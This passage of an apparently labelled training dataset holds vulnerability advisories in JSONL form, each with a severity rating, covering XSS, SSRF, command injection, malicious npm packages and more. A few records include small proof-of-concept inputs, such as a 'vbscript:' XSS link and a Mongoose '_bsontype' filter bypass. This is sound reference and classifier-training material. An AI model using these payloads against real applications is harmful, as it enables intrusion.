scratch-svg-renderer\n\nThis affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.", "text_raw": "Cross-Site Scripting in scratch-svg-renderer\n\n[Severity: HIGH]\n\nThis affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-11-09", "split": "train"} -{"id": "773010a7e672d3228f92", "text": "Server-Side Request Forgery in ssrf-agent\n\nThe package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.", "text_raw": "Server-Side Request Forgery in ssrf-agent\n\n[Severity: MEDIUM]\n\nThe package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-02", "split": "train"} -{"id": "946638e1097a6667e4b8", "text": "Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit", "text_raw": "Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2009-02-20", "split": "train"} -{"id": "4ce41e4dcdffc2bf3010", "text": "OS command injection in aws-lambda\n\nIn aws-lambda versions prior to version 1.0.5, the \"config.FunctioName\" is used to construct the argument used within the \"exec\" function without any sanitization. It is possible for a user to inject arbitrary commands to the \"zipCmd\" used within \"config.FunctionName\".", "text_raw": "OS command injection in aws-lambda\n\n[Severity: CRITICAL]\n\nIn aws-lambda versions prior to version 1.0.5, the \"config.FunctioName\" is used to construct the argument used within the \"exec\" function without any sanitization. It is possible for a user to inject arbitrary commands to the \"zipCmd\" used within \"config.FunctionName\".", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-02-14", "split": "train"} -{"id": "1468ba32316c3c0638f3", "text": "Malicious Package in hulp\n\nAll versions of `hulp` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in hulp\n\n[Severity: CRITICAL]\n\nAll versions of `hulp` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "c0ee09c7fc96b64dcc54", "text": "Apple macOS Unspecified Vulnerability\n\nAffected: Apple macOS\n\nApple macOS Transparency, Consent, and Control (TCC) contains an unspecified permissions issue which may allow a malicious application to bypass privacy preferences.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple macOS Unspecified Vulnerability\n\nAffected: Apple macOS\n\nApple macOS Transparency, Consent, and Control (TCC) contains an unspecified permissions issue which may allow a malicious application to bypass privacy preferences.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "563c73bf8836d279824f", "text": "Path Traversal in @wturyn/swagger-injector\n\nAll versions of `@wturyn/swagger-injector` are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured `dist` folder using relative paths.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "text_raw": "Path Traversal in @wturyn/swagger-injector\n\n[Severity: CRITICAL]\n\nAll versions of `@wturyn/swagger-injector` are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured `dist` folder using relative paths.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "439a6e90bd78a6880822", "text": "Remote Memory Exposure in request\n\nAffected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.\n\n## Proof of Concept\n\n```js\nvar request = require('request');\nvar http = require('http');\n\nvar serveFunction = function (req, res){\n\treq.on('data', function (data) {\n console.log(data)\n });\n\tres.end();\n};\nvar server = http.createServer(serveFunction);\nserver.listen(8000);\n\nrequest({\n\tmethod: \"POST\",\n\turi: 'http://localhost:8000',\n\tmultipart: [{body:500}]\n},function(err,res,body){});\n```\n\n## Recommendation\n\nUpdate to version 2.68.0 or later", "text_raw": "Remote Memory Exposure in request\n\n[Severity: MEDIUM]\n\nAffected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.\n\n## Proof of Concept\n\n```js\nvar request = require('request');\nvar http = require('http');\n\nvar serveFunction = function (req, res){\n\treq.on('data', function (data) {\n console.log(data)\n });\n\tres.end();\n};\nvar server = http.createServer(serveFunction);\nserver.listen(8000);\n\nrequest({\n\tmethod: \"POST\",\n\turi: 'http://localhost:8000',\n\tmultipart: [{body:500}]\n},function(err,res,body){});\n```\n\n\n## Recommendation\n\nUpdate to version 2.68.0 or later", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-11-09", "split": "train"} -{"id": "ac1e5df1bb2d9815e718", "text": "GitLab Community and Enterprise Editions Remote Code Execution Vulnerability\n\nAffected: GitLab Community and Enterprise Editions\n\nGitHub Community and Enterprise Editions that utilize the ability to upload images through GitLab Workhorse are vulnerable to remote code execution. Workhorse passes image file extensions through ExifTool, which improperly validates the image files.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "GitLab Community and Enterprise Editions Remote Code Execution Vulnerability\n\nAffected: GitLab Community and Enterprise Editions\n\nGitHub Community and Enterprise Editions that utilize the ability to upload images through GitLab Workhorse are vulnerable to remote code execution. Workhorse passes image file extensions through ExifTool, which improperly validates the image files.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20, CWE-95\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "89f57d391e9158662652", "text": "Doorkeeper-openid_connect contains Open Redirect\n\nDoorkeeper::OpenidConnect (aka the OpenID Connect extension for Doorkeeper) 1.4.x and 1.5.x before 1.5.4 has an open redirect via the redirect_uri field in an OAuth authorization request (that results in an error response) with the 'openid' scope and a prompt=none value. This allows phishing attacks against the authorization flow.", "text_raw": "Doorkeeper-openid_connect contains Open Redirect\n\n[Severity: MEDIUM]\n\nDoorkeeper::OpenidConnect (aka the OpenID Connect extension for Doorkeeper) 1.4.x and 1.5.x before 1.5.4 has an open redirect via the redirect_uri field in an OAuth authorization request (that results in an error response) with the 'openid' scope and a prompt=none value. This allows phishing attacks against the authorization flow.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-03-25", "split": "train"} -{"id": "82ecd41145042ddae4fd", "text": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0592.", "text_raw": "High severity vulnerability that affects Microsoft.ChakraCore\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0592.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-09", "split": "train"} -{"id": "2014ec9a847225bee8b0", "text": "TeraCopy 2.3 (default.mo) Language File Integer Overflow Vulnerability", "text_raw": "TeraCopy 2.3 (default.mo) Language File Integer Overflow Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-09-18", "split": "train"} -{"id": "8938b047010620f1e50f", "text": "Cross-Site Scripting in node-red\n\nVersions of `node-red` prior to 0.20.8are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new Flows, allowing attackers to execute arbitrary JavaScript in the victim's browser.\n\n## Recommendation\n\nUpgrade to version 0.18.6 or later.", "text_raw": "Cross-Site Scripting in node-red\n\n[Severity: MEDIUM]\n\nVersions of `node-red` prior to 0.20.8are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new Flows, allowing attackers to execute arbitrary JavaScript in the victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 0.18.6 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-01-30", "split": "train"} -{"id": "a0095ac12dfde787a673", "text": "Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability", "text_raw": "Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2010-11-20", "split": "train"} -{"id": "055fd6a6d8d335581789", "text": "Command Injection in dns-sync\n\nAffected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method.\n\n## Recommendation\n\n- Use an alternative dns resolver\n- Do not allow untrusted input into `dns-sync.resolve()`", "text_raw": "Command Injection in dns-sync\n\n[Severity: CRITICAL]\n\nAffected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method. \n\n\n\n## Recommendation\n\n- Use an alternative dns resolver\n- Do not allow untrusted input into `dns-sync.resolve()`", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-07-18", "split": "train"} -{"id": "b140e0a26edafaf79c83", "text": "HTTP Request smuggling in tiny_http\n\nHTTP pipelining issues and request smuggling attacks are possible due to incorrect Transfer encoding header parsing. It is possible conduct HTTP request smuggling attacks (CL:TE/TE:TE) by sending invalid Transfer Encoding headers. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own.", "text_raw": "HTTP Request smuggling in tiny_http\n\n[Severity: MEDIUM]\n\nHTTP pipelining issues and request smuggling attacks are possible due to incorrect Transfer encoding header parsing. It is possible conduct HTTP request smuggling attacks (CL:TE/TE:TE) by sending invalid Transfer Encoding headers. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack, or obtain sensitive information from requests other than their own.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "727fde78b4c159159b27", "text": "Improper validation of certificate with host mismatch in Apache Log4j SMTP appender\n\nImproper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.", "text_raw": "Improper validation of certificate with host mismatch in Apache Log4j SMTP appender\n\n[Severity: LOW]\n\nImproper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-06-05", "split": "train"} -{"id": "932e77e14c509a35c0bb", "text": "Apache Hive before 0.13.1, when in SQL standards based authorization mode, does not properly check the file permissions for (1) import and (2) export statements, which allows remote authenticated users to obtain sensitive information via a crafted URI.", "text_raw": "Low severity vulnerability that affects org.apache.hive:hive-exec, org.apache.hive:hive, and org.apache.hive:hive-service\n\n[Severity: LOW]\n\nApache Hive before 0.13.1, when in SQL standards based authorization mode, does not properly check the file permissions for (1) import and (2) export statements, which allows remote authenticated users to obtain sensitive information via a crafted URI.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2018-11-21", "split": "train"} -{"id": "c3e2e7495677458cc4a8", "text": "Checkstyle prior to 8.18 loads external DTDs by default, which can potentially lead to denial of service attacks or the leaking of confidential information.", "text_raw": "Moderate severity vulnerability that affects com.puppycrawl.tools:checkstyle\n\n[Severity: MEDIUM]\n\nCheckstyle prior to 8.18 loads external DTDs by default, which can potentially lead to denial of service attacks or the leaking of confidential information.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-03-14", "split": "train"} -{"id": "e50cb6b1556a05cae47c", "text": "VBScript Content Injection in marked\n\nVersions 0.3.2 and earlier of `marked` are affected by a cross-site scripting vulnerability even when `sanitize:true` is set.\n\n## Proof of Concept ( IE10 Compatibility Mode Only )\n\n`[xss link](vbscript:alert(1))`\n\nwill get a link\n\n`xss link`\n\n## Recommendation\n\nUpdate to version 0.3.3 or later.", "text_raw": "VBScript Content Injection in marked\n\n[Severity: MEDIUM]\n\nVersions 0.3.2 and earlier of `marked` are affected by a cross-site scripting vulnerability even when `sanitize:true` is set. \n\n## Proof of Concept ( IE10 Compatibility Mode Only )\n\n`[xss link](vbscript:alert(1))`\n\nwill get a link\n\n`xss link`\n\n\n## Recommendation\n\nUpdate to version 0.3.3 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "dcbec83db144978a7e26", "text": "Header injection possible in Django\n\nIn Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.", "text_raw": "Header injection possible in Django\n\n[Severity: MEDIUM]\n\nIn Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-09", "split": "train"} -{"id": "f09cbc1e9b828a6843b4", "text": "Remote code execution in rwiki\n\nThe editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to execute arbitrary Ruby code via unknown attack vectors.", "text_raw": "Remote code execution in rwiki\n\n[Severity: HIGH]\n\nThe editing form in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to execute arbitrary Ruby code via unknown attack vectors.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "aacbec6907842f5ad921", "text": "Request smuggling is possible when both chunked TE and content length specified\n\n### Impact\nRequest smuggling is possible when running behind a proxy that doesn't handle Content-Length and Transfer-Encoding properly or doesn't handle alone \\n as a headers separator.\n\n### Patches\nhttps://github.com/ktorio/ktor/pull/1547\n\n### Workarounds\nNone except migrating to a better proxy.\n\n### References\nhttps://portswigger.net/web-security/request-smuggling\nhttps://tools.ietf.org/html/rfc7230#section-9.5", "text_raw": "Request smuggling is possible when both chunked TE and content length specified\n\n[Severity: LOW]\n\n### Impact\nRequest smuggling is possible when running behind a proxy that doesn't handle Content-Length and Transfer-Encoding properly or doesn't handle alone \\n as a headers separator.\n\n### Patches\nhttps://github.com/ktorio/ktor/pull/1547\n\n### Workarounds\nNone except migrating to a better proxy.\n\n### References\nhttps://portswigger.net/web-security/request-smuggling\nhttps://tools.ietf.org/html/rfc7230#section-9.5", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-01-27", "split": "train"} -{"id": "789b8b3f7eea6050a2af", "text": "Forced Logout in keycloak-connect\n\nVersions of `keycloak-connect` prior to 4.4.0 are vulnerable to Forced Logout. The package fails to validate JWT signatures on the `/k_logout` route, allowing attackers to logout users and craft malicious JWTs with NBF values that prevent user access indefinitely.\n\n## Recommendation\n\nUpgrade to version 4.4.0 or later.", "text_raw": "Forced Logout in keycloak-connect\n\n[Severity: MEDIUM]\n\nVersions of `keycloak-connect` prior to 4.4.0 are vulnerable to Forced Logout. The package fails to validate JWT signatures on the `/k_logout` route, allowing attackers to logout users and craft malicious JWTs with NBF values that prevent user access indefinitely.\n\n\n## Recommendation\n\nUpgrade to version 4.4.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-13", "split": "train"} -{"id": "aea2e864909b8beb3714", "text": "Command Injection in wiki-plugin-datalog\n\nVersions of `wiki-plugin-datalog` prior to 0.1.6 are vulnerable to Command Injection. The package failed to sanitize URLs on the curl endpoint, allowing attackers to inject commands and possibly achieving Remote Code Execution on the system.\n\n## Recommendation\n\nUpgrade to version 0.1.6 or later.", "text_raw": "Command Injection in wiki-plugin-datalog\n\n[Severity: HIGH]\n\nVersions of `wiki-plugin-datalog` prior to 0.1.6 are vulnerable to Command Injection. The package failed to sanitize URLs on the curl endpoint, allowing attackers to inject commands and possibly achieving Remote Code Execution on the system.\n\n\n## Recommendation\n\nUpgrade to version 0.1.6 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-06-13", "split": "train"} -{"id": "d132b4136fedb387f157", "text": "Privilege escalation via form generator\n\n### Impact\n\nIt is possible for untrusted users to gain administrator rights with the form generator.\n\nInstallations are only affected if there are untrusted back end users with access to the form generator.\n\n### Patches\n\nUpdate to Contao 4.4.56, 4.9.18 or 4.11.7.\n\n### Workarounds\n\nDisable the form generator or disable the login for untrusted back end users.\n\n### References\n\nhttps://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", "text_raw": "Privilege escalation via form generator\n\n[Severity: HIGH]\n\n### Impact\n\nIt is possible for untrusted users to gain administrator rights with the form generator.\n\nInstallations are only affected if there are untrusted back end users with access to the form generator.\n\n### Patches\n\nUpdate to Contao 4.4.56, 4.9.18 or 4.11.7.\n\n### Workarounds\n\nDisable the form generator or disable the login for untrusted back end users.\n\n### References\n\nhttps://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "9b911bd921410948afe6", "text": "Null pointer dereference in TensorFlow leads to exploitation\n\nGoogle TensorFlow 1.0.0 through 1.5.1 is affected by: Null Pointer Dereference. The type of exploitation is: context-dependent.", "text_raw": "Null pointer dereference in TensorFlow leads to exploitation\n\n[Severity: HIGH]\n\nGoogle TensorFlow 1.0.0 through 1.5.1 is affected by: Null Pointer Dereference. The type of exploitation is: context-dependent.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-24", "split": "train"} -{"id": "66bd22c431643137513e", "text": "Double free in ordnung\n\nAn issue was discovered in the ordnung crate through version 0.0.1 for Rust. compact::Vec violates memory safety via a remove() double free.", "text_raw": "Double free in ordnung\n\n[Severity: HIGH]\n\nAn issue was discovered in the ordnung crate through version 0.0.1 for Rust. compact::Vec violates memory safety via a remove() double free.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "00d35711f88b705615fe", "text": "Injection and Cross-site Scripting in osm-static-maps\n\nThis affects all versions of package osm-static-maps under 3.9.0. User input given to the package is passed directly to a template without escaping `({{{ ... }}})`. As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read.", "text_raw": "Injection and Cross-site Scripting in osm-static-maps\n\n[Severity: HIGH]\n\nThis affects all versions of package osm-static-maps under 3.9.0. User input given to the package is passed directly to a template without escaping `({{{ ... }}})`. As such, it is possible for an attacker to inject arbitrary HTML/JS code and depending on the context. It will be outputted as an HTML on the page which gives opportunity for XSS or rendered on the server (puppeteer) which also gives opportunity for SSRF and Local File Read.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "ea0524144e33e51cbb59", "text": "ManageEngine OpManager Privilege Escalation", "text_raw": "ManageEngine OpManager Privilege Escalation\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2019-01-18", "split": "train"} -{"id": "b74529b3a0c380775b9f", "text": "KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration", "text_raw": "KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2021-03-18", "split": "train"} -{"id": "5d5f0e5f68629374581e", "text": "Improper Input Validation in Automattic Mongoose\n\nAutomattic Mongoose through 5.7.4 allows attackers to bypass access control (in some applications) because any query object with a `_bsontype` attribute is ignored. For example, adding `\"_bsontype\":\"a\"` can sometimes interfere with a query filter. NOTE: this CVE is about Mongoose's failure to work around this _bsontype special case that exists in older versions of the bson parser (aka the mongodb/js-bson project).", "text_raw": "Improper Input Validation in Automattic Mongoose\n\n[Severity: CRITICAL]\n\nAutomattic Mongoose through 5.7.4 allows attackers to bypass access control (in some applications) because any query object with a `_bsontype` attribute is ignored. For example, adding `\"_bsontype\":\"a\"` can sometimes interfere with a query filter. NOTE: this CVE is about Mongoose's failure to work around this _bsontype special case that exists in older versions of the bson parser (aka the mongodb/js-bson project).", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-10-22", "split": "train"} -{"id": "18e9c85d88ba218434bb", "text": "Heap out of bounds access in MakeEdge in TensorFlow\n\n### Impact\nUnder certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The [`MakeEdge` function](https://github.com/tensorflow/tensorflow/blob/3616708cb866365301d8e67b43b32b46d94b08a0/tensorflow/core/common_runtime/graph_constructor.cc#L1426-L1438) creates an edge between one output tensor of the `src` node (given by `output_index`) and the input slot of the `dst` node (given by `input_index`). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding `DataType` values and comparing these for equality:\n\n```cc\n DataType src_out = src->output_type(output_index);\n DataType dst_in = dst->input_type(input_index);\n //...\n```\n\nHowever, there is no check that the indices point to inside of the arrays they index into. Thus, this can result in accessing data out of bounds of the corresponding heap allocated arrays.\n\nIn most scenarios, this can manifest as unitialized data access, but if the index points far away from the boundaries of the arrays this can be used to leak addresses from the library.\n\n### Patches\nWe have patched the issue in GitHub commit [0cc38aaa4064fd9e79101994ce9872c6d91f816b](https://github.com/tensorflow/tensorflow/commit/0cc38aaa4064fd9e79101994ce9872c6d91f816b) and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.\n\nSince this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "text_raw": "Heap out of bounds access in MakeEdge in TensorFlow\n\n[Severity: MEDIUM]\n\n### Impact\nUnder certain cases, loading a saved model can result in accessing uninitialized memory while building the computation graph. The [`MakeEdge` function](https://github.com/tensorflow/tensorflow/blob/3616708cb866365301d8e67b43b32b46d94b08a0/tensorflow/core/common_runtime/graph_constructor.cc#L1426-L1438) creates an edge between one output tensor of the `src` node (given by `output_index`) and the input slot of the `dst` node (given by `input_index`). This is only possible if the types of the tensors on both sides coincide, so the function begins by obtaining the corresponding `DataType` values and comparing these for equality:\n\n```cc\n DataType src_out = src->output_type(output_index);\n DataType dst_in = dst->input_type(input_index);\n //...\n```\n\nHowever, there is no check that the indices point to inside of the arrays they index into. Thus, this can result in accessing data out of bounds of the corresponding heap allocated arrays.\n\nIn most scenarios, this can manifest as unitialized data access, but if the index points far away from the boundaries of the arrays this can be used to leak addresses from the library.\n\n### Patches\nWe have patched the issue in GitHub commit [0cc38aaa4064fd9e79101994ce9872c6d91f816b](https://github.com/tensorflow/tensorflow/commit/0cc38aaa4064fd9e79101994ce9872c6d91f816b) and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.\n\nSince this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-12-10", "split": "train"} -{"id": "ae6992870e5b4606676d", "text": "Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability", "text_raw": "Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-06-10", "split": "train"} -{"id": "e0049d11239f714b652c", "text": "Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities", "text_raw": "Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-02-26", "split": "train"} -{"id": "d003783e1316d74f4b84", "text": "Zenario CMS 7.0.2d Reflected XSS and Open Redirect Vulnerabilities", "text_raw": "Zenario CMS 7.0.2d Reflected XSS and Open Redirect Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2014-11-20", "split": "train"} -{"id": "2ebb5a64aab16289c7da", "text": "opencontainers runc contains procfs race condition with a shared volume mount\n\n### Impact\nBy crafting a malicious root filesystem (with `/proc` being a symlink to a directory which was inside a volume shared with another running container), an attacker in control of both containers can trick `runc` into not correctly configuring the container's security labels and not correctly masking paths inside `/proc` which contain potentially-sensitive information about the host (or even allow for direct attacks against the host).\n\nIn order to exploit this bug, an untrusted user must be able to spawn custom containers with custom mount configurations (such that a volume is shared between two containers). It should be noted that we consider this to be a fairly high level of access for an untrusted user -- and we do not recommend allowing completely untrusted users to have such degrees of access without further restrictions.\n\n### Specific Go Package Affected\ngithub.com/opencontainers/runc/libcontainer\n\n### Patches\nThis vulnerability has been fixed in `1.0.0-rc10`. It should be noted that the current fix is effectively a hot-fix, and there are known ways for it to be worked around (such as making the entire root filesystem a shared volume controlled by another container). We recommend that users review their access policies to ensure that untrusted users do not have such high levels of controls over container mount configuration.\n\n### Workarounds\nIf you are not providing the ability for untrusted users to configure mountpoints for `runc` (or through a higher-level tool such as `docker run -v`) then you are not vulnerable to this issue. This exploit requires fairly complicated levels of access (which are available for some public clouds but are not necessarily available for all deployments).\n\nAdditionally, it appears as though it is not possible to exploit this vulnerability through Docker (due to the order of mounts Docker generates). However you should not depend on this, as it may be possible to work around this roadblock.\n\n### Credits\nThis vulnerability was discovered by Cure53, as part of a third-party security audit.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/opencontainers/runc/issues/new).\n* Email us at [dev@opencontainers.org](mailto:dev@opencontainers.org), or [security@opencontainers.org](mailto:security@opencontainers.org) if you think you've found a security bug.", "text_raw": "opencontainers runc contains procfs race condition with a shared volume mount\n\n[Severity: MEDIUM]\n\n### Impact\nBy crafting a malicious root filesystem (with `/proc` being a symlink to a directory which was inside a volume shared with another running container), an attacker in control of both containers can trick `runc` into not correctly configuring the container's security labels and not correctly masking paths inside `/proc` which contain potentially-sensitive information about the host (or even allow for direct attacks against the host).\n\nIn order to exploit this bug, an untrusted user must be able to spawn custom containers with custom mount configurations (such that a volume is shared between two containers). It should be noted that we consider this to be a fairly high level of access for an untrusted user -- and we do not recommend allowing completely untrusted users to have such degrees of access without further restrictions.\n\n### Specific Go Package Affected\ngithub.com/opencontainers/runc/libcontainer\n\n### Patches\nThis vulnerability has been fixed in `1.0.0-rc10`. It should be noted that the current fix is effectively a hot-fix, and there are known ways for it to be worked around (such as making the entire root filesystem a shared volume controlled by another container). We recommend that users review their access policies to ensure that untrusted users do not have such high levels of controls over container mount configuration.\n\n### Workarounds\nIf you are not providing the ability for untrusted users to configure mountpoints for `runc` (or through a higher-level tool such as `docker run -v`) then you are not vulnerable to this issue. This exploit requires fairly complicated levels of access (which are available for some public clouds but are not necessarily available for all deployments).\n\nAdditionally, it appears as though it is not possible to exploit this vulnerability through Docker (due to the order of mounts Docker generates). However you should not depend on this, as it may be possible to work around this roadblock.\n\n### Credits\nThis vulnerability was discovered by Cure53, as part of a third-party security audit.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/opencontainers/runc/issues/new).\n* Email us at [dev@opencontainers.org](mailto:dev@opencontainers.org), or [security@opencontainers.org](mailto:security@opencontainers.org) if you think you've found a security bug.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-27", "split": "train"} -{"id": "b8ba83eb2d5e395cdd85", "text": "Malicious Package in buffmr-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in buffmr-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the 